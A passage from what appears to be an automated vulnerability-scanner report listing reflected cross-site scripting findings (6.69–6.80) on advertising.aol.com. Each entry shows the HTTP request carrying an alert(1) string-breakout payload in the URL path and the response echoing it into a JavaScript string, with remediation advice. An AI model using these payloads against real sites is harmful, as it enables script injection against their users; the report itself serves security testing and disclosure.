Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b8b5b"-alert(1)-"30d7f6c4bc8/0/3/1885310732/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/b8b5b"-alert(1)-"30d7f6c4bc8/0/3/1885310732/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.69. http://advertising.aol.com/token/1/1/1462706141/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/1/1462706141/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15615"-alert(1)-"5700fdbf314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15615"-alert(1)-"5700fdbf314/1/1/1462706141/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/15615"-alert(1)-"5700fdbf314/1/1/1462706141/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.70. http://advertising.aol.com/token/1/3/1308197307/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1308197307/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8fc"-alert(1)-"acb9261f595 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3c8fc"-alert(1)-"acb9261f595/1/3/1308197307/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3c8fc"-alert(1)-"acb9261f595/1/3/1308197307/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.71. http://advertising.aol.com/token/2/2/2011729621/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/2011729621/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 396da"-alert(1)-"04d2d0ed828 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /396da"-alert(1)-"04d2d0ed828/2/2/2011729621/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:13:20 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:13:20 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/396da"-alert(1)-"04d2d0ed828/2/2/2011729621/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.72. http://advertising.aol.com/token/2/3/868831419/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/868831419/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3332d"-alert(1)-"810b85bd8ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3332d"-alert(1)-"810b85bd8ec/2/3/868831419/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:09 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:09 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/3332d"-alert(1)-"810b85bd8ec/2/3/868831419/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.73. http://advertising.aol.com/token/3/2/1144859041/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/2/1144859041/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4caa4"-alert(1)-"eac3de24a0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4caa4"-alert(1)-"eac3de24a0a/3/2/1144859041/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4caa4"-alert(1)-"eac3de24a0a/3/2/1144859041/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.74. http://advertising.aol.com/token/3/3/963398391/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/963398391/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58984"-alert(1)-"db9af180a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /58984"-alert(1)-"db9af180a85/3/3/963398391/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/58984"-alert(1)-"db9af180a85/3/3/963398391/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.75. http://advertising.aol.com/token/4/1/1214941173/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1214941173/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dc75"-alert(1)-"223c83815de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6dc75"-alert(1)-"223c83815de/4/1/1214941173/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6dc75"-alert(1)-"223c83815de/4/1/1214941173/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.76. http://advertising.aol.com/token/4/3/1727096706/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1727096706/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cff9"-alert(1)-"351e258ca98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7cff9"-alert(1)-"351e258ca98/4/3/1727096706/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:51 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7cff9"-alert(1)-"351e258ca98/4/3/1727096706/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.77. http://advertising.aol.com/token/5/2/2011695027/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/2011695027/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e79f0"-alert(1)-"d038ede19e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e79f0"-alert(1)-"d038ede19e7/5/2/2011695027/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:06 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e79f0"-alert(1)-"d038ede19e7/5/2/2011695027/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.78. http://advertising.aol.com/token/5/3/803328935/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/803328935/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6958e"-alert(1)-"433e65134d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6958e"-alert(1)-"433e65134d/5/3/803328935/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6958e"-alert(1)-"433e65134d/5/3/803328935/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.79. http://advertising.aol.com/token/6/1/737485457/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/737485457/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615c2"-alert(1)-"fa11a1a72a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /615c2"-alert(1)-"fa11a1a72a0/6/1/737485457/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/615c2"-alert(1)-"fa11a1a72a0/6/1/737485457/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.80. http://advertising.aol.com/token/6/3/807811660/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/807811660/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2eae"-alert(1)-"175f56d7e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

